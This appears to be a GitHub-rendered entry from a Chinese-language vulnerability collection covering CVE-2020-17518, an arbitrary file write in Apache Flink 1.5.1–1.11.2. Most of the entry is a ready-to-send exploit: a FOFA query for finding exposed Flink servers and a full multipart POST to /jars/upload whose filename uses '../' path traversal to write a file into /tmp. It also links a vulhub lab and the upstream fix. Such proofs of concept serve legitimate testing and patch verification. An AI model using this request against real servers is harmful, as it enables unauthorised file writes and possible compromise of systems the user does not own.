Skip to content

Latest commit

 

History

History
35 lines (25 loc) · 849 Bytes

CVE-2020-17518 Apache Flink 任意文件写入.md

File metadata and controls

35 lines (25 loc) · 849 Bytes

CVE-2020-17518 Apache Flink 任意文件写入

影响范围

Apache Flink 1.5.1 ~ 1.11.2

FOFA:

app="APACHE-Flink" 
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 201

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/ywhack.txt"

forum.ywhack.com
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

ref

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4